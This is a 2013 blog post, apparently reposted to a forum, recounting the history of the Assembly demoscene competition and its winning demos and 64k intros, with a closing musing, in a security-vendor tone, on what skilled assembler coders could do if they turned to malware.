  25. How Scary Can An Old-School Programmer Be? March 5, 2013 Tyler Durden Recently Eugene Kaspersky wrote in his blog a post about the so called Big Comeback of old-school virus writers. I am old enough to remember those guys and their brilliant work – I don’t necessarily mean malware creators, I’m talking about programmers, coders and assembler masters. They are like Jedi and the Sith of Old Empire whom all Skywalker-related saga heroes considered much more powerful and skilled with the light sabers (no kiddin’, ask Yoda). And I thought… damn… there are probably around 3 people left out there who witnessed the true power of those people (me, Kaspersky and Bill Gates). Seriously – it is quite hard to understand what an old school hacker is capable of – I decided to show you what Eugene was talking about, so you could decide for yourself whether this was scary news. Extreme workout for stupid calculators Back in 1992 computers were basically smart calculators with big screens (this is not a joke, kids). But there were several groups of enthusiasts who were happy to face software challenges: some programmers managed to create codes that used every byte of memory, every processor function and register, every OS command and, what is most important, 100% of hardware power – squeezed it all to the last drop and checked out the result. I have to point out that in order to truly nail those tasks, one has to be damn creative, drink a lot of coffee (or smoke a lot of weed, let’s be honest) – and have an insane IQ level. The movement itself started around 1988, basically, together with first more or less widely spread version of MS-DOS. It had no official name, but according to the laws of evolution, sooner or later they’d have to compete. And this is how “Assembly” was born in 1992. Future Crew is back from the future In 1992 a group of Scandinavian coders called “Future Crew” together with their friends from “Complex” and “Amiga” programming groups organized an event called “The Assembly” in order to share the results of their kick-ass work on Assembler language and compete for the title of the Best Coder of the year. There were several disciplines, but two most interesting are platform (PC, Amiga, C64) demos and PC 64k. The first had the goal of demonstrating the most elegant coding solutions/best abilities of the hardware with minimalistic and optimal code. The second was a tricky one – coders were limited to 64kb – their compiled programs (means – read2work file(s)) could not be more than 64kilobytes – that’s why this nomination turned out to be a contest of codin’ elegance. A coding demo is basically a scripted serie of events programmed to demonstrate the capabilities of hardware or/and top software solutions for a particular task, such as complex physics calculations” Back in 1992 the Future Crew won the competition with their “Unreal” demo. Here it is (note that this is 1992 and there’s no Windows yet. This demo was called Unreal for a reason – nobody(!) performed anything like that before): They were the first to demonstrate a 3D environment working model, layers of graphics, complex physics and lighting calculations, etc. And the whole compile code was about 1 megabyte (including music! – and let me point out that there were no mp3 compressions yet). The only way to achieve such a result was mastering Assembler – to my opinion – the most complex programming languages ever. Just so you have an idea of what Assembler is, here is what guys from Future Crew told me years ago: Learning to code demos is a long and very very difficult process. It takes years to learn to code demos very well. A good way to start is some high level language like Pascal or C and then started to experiment with assembler. It takes a lot of time and experimenting to get better, and there are no shortcuts. The main thing is trying to understand what you do, then trying to change the program to see what you get, and gain wisdom in what’s the best way of doing things. Learning to code well requires a lot of patience, a lot of enthusiasm and a lot of time. It is not easy. Basically those who were engaged in the competition turned out to become The Ultimate Source of inspiration for all the software developers. I’m not saying that someone was stealing their ideas, no – everyone was just… adopting their creative vision. Most products we have today – ALL GAMES, Adobe graphics and video products, meteo and GPS, Google Earth… all of those multibillion dollar products were inspired by Assembly at certain point. (BTW – filming and photo shooting are strictly forbidden inside the event’s room – violators are banned forever). 1993 – the year of “Second Reality” and Eclipse The Assembly turned out to be such a success that next year the number of attendants and presented demos doubled (the trend was pretty constant, as since 1999 the Assembly takes place in the biggest football area in Helsinki (Finland) that fits ~5000 attendants from all the globe). In 1993 Future Crew presented something… fantastic, something that set the quality bar for all further contests and changed the programming world forever – the Second Reality demo: It is essential to understand, that this demo was created BEFORE Intel presented their Pentium processors (Intel announced it 22 of march and first Pentiuim-PC’s were shipped only in 1994, and Assembly usually takes place in Summer – Juli/August. It means that Future Crew showed it at least half a year before shipments of Pentium started). It means that all those fantastic graphics and sounds were available on x486 CPUs with primitive sound blasters and NO-graphic cards. This demo blew away the jury and the coding community – it showed what results could be achieved with pro-level Assembler work and minimalistic approach (compiled code of Second Reality was about 1,5 megabytes). This year made Future Crew world famous. This is a video of “Behind the scenes” of Future crew – when they were working on Second Reality: In 1994, the demo “Verses” (by EMC group) won the first pace. Basically, they showed the world that realistic water physics calculations can be done and any morphing of 3D objects within Pentium speed limit is a piece of cake: And this 64kb winner – “Airframe” by Prime group is the mother and father of All modern 3D aviation and space simulators: Just so you get an idea of how quickly the code evolved, here’s a list of all winners from 1995 to 2012. 1995 Assembly Winner: “Stars” by NoooN group 1996 Assembly Winner: “Machines of Madness” by Dubius group 1997 Assembly Winner: “Boost” by Doomsday group 1998 Assembly Winner: “Gateways” by Trauma group http://www.youtube.com/watch?feature=player_embedded&v=QgGmbqIqX_A By the way – this is the ancestor of World of Warcraft visual realisation. This is when the 3D MMORPG visuals were created. In 1999 the 3DFX technology changed the graphics forever. And the demo by MatureFunk group called “Virhe” blew everybody’s minds away: PD11F4A8B45A34E3BAssembly revised In 2000 the rules changed a bit – instead of competing in 3 categories – Amiga, PC and C64 they started to compete in “Combined Demo”, “Oldschool demo” and “64kb limit intro” categories. 64k competition became obsolete in 2010. But in the end of this post you’ll see some really fantastic examples of what a pro assembler coder can fit within 64 kilobytes. This is the list of winners in Combined Demo category, which is the most brilliant in terms of Assembler mastery: 2000 first prize winner was “Spot” by Exceed group Check out the lighting effects… they are amazing – remember – this is 13 years ago technologies! 2001 Assembly Winner was “Lapsuus” by Maturefurk group 2002 Assembly winner was “Liquid… Wen?” by Haujobb group http://www.youtube.com/watch?feature=player_embedded&v=Ae8UK9mscWg I have to pinpoint the fact that all graphics, including faces and characters in all demos of Assembly are drawn ONLY using the code – those are not picture-files included in the demo. No, sir! 2003 Assembly Winner was “Legomania” by Doomsday. Say hello to All 3d console games:) And, I’m sure that this is the time when new Nintendo Wii vision was born: http://www.youtube.com/watch?feature=player_embedded&v=gU70QGtkUm0 2004 first prise went to “Obsoleet” by Unreal Voodoo http://www.youtube.com/watch?feature=player_embedded&v=MUWskk0k6XU 2005 first prize of Assembly went to “Lconoclast” by ASD group: http://www.youtube.com/watch?feature=player_embedded&v=CAKMa8-LA9w In 2006 the demo “Starstuck” by The Black Lotus coding group blasted the community again, but he level of sophistication of graphic coding. I’d say that they raise the bar a lot: http://www.youtube.com/watch?feature=player_embedded&v=-wtMEBPWeMo 2007 winner of Assembly was “LifeForce” by ASD. And this was, once again, a pice of fantastic Assembler work: http://www.youtube.com/watch?feature=player_embedded&v=PDWGLLJLLLk 2008 was the ear of “Within Epsilon” by Pyrotech: http://www.youtube.com/watch?feature=player_embedded&v=4YvYnHvhI_E 2009 winner is one of my personal favourites – “Frameranger” by Fairlight, CNCD & Orange groups: http://www.youtube.com/watch?feature=player_embedded&v=luhHghCAEaQ In 2010 “Happiness is right around the bend” by ASD showed a fantastic tank http://www.youtube.com/watch?feature=player_embedded&v=z8wfYd9Y-_4 2011 Assembly winner was “Spin” by ASD: http://www.youtube.com/watch?feature=player_embedded&v=T_U3Zdv8to8 2012 was phenomenal – “Spacecut” by Carillon & Cyberiad CNCD http://www.youtube.com/watch?feature=player_embedded&v=eJF-kdutNxs 64 kilobytes limit best examples Just so you get an idea what a professional programmer can do within 64 kilobites: this is the best of 2005 – “Che Guevara” by Fairlight http://www.youtube.com/watch?feature=player_embedded&v=bG-6PbGKzcE I repeat – this is 64 kilobytes of assembler code. Not a byte more. But 3 years later, in 2008, the same group demonstrated an immense progress in technology and managed to fit within 64kb a demo like this one – “Panic room” - and won the first prize in this category: http://www.youtube.com/watch?feature=player_embedded&v=MQZ1qGENxP8 But the best 64k demo EVER presented, was “X marks the spot” by portal process in 2010 – first prize winner of Asselbly in 64k category: http://www.youtube.com/watch?feature=player_embedded&v=OhAx2c0U5WA And now… let me draw you a small picture here… All those demos, especially limited to 64kb length, show the results a talented old-school programmer can deliver when he puts his mind into it, but, what is more important, when he is a Master of Assembler – something that is not very common nowadays, when most products are created within Visual so called “high-level” programming languages, such as Visual C and Object C. Just imagine for a second, that a programmer like this, or a group like Future Crew decides to screw all the 3D creative, music, phycisc and just get read of all this enthusiasm and focus on just one goal – create a small code that steals your financial data or helps to re-calibrate a Nuclear Reactor. How do you think, would they succeed? How long would be the code if 64kilobytes is more than enough? Would they find a way to break the Windows or Apple integrated security systems? Are they mobile? Are they flexible? Do they have finances to make this true if they were doing a free 5000-attendee events for 20 years? I don’t want to tell you the answer. You have to decide for yourself. But when I hear someone saying – “My PC does not require protection” – I can’t help but remember the “Second reality” and start praying. Thank God that guys that were Future Crew are now very busy if you’re the best in coding the demos, why not to make it your business, right? Next time you run a 3DMark 2011 test on your PC – think of Unreal, Second Reality and Future Crew. Future Crew as a team did not release anything after Scream Tracker 3 (December 1994). While it was never officially dissolved, its members parted ways in the second half of the 1990s. Companies like Futuremark (3DMark), Remedy (Death Rally, Max Payne, Alan Wake), Bugbear Entertainment (FlatOut, Glimmerati, Rally Trophy), Bitboys (a graphics hardware company) and Recoil Games (Rochard) were all started in whole or in part by members of Future Crew. I want to thank all of them – they changed the world forever and showed us that everything is possible if you put your mind into it. Including Kaspersky Internet Security. Thank you for your inspiration, guys. And deep inside of my head I hope that not a single programmer, who was part of The Assembly would ever use his/her skills for evil purposes. Sursa: How Scary Can An Old-School Programmer Could Be?
×
×
  • Create New...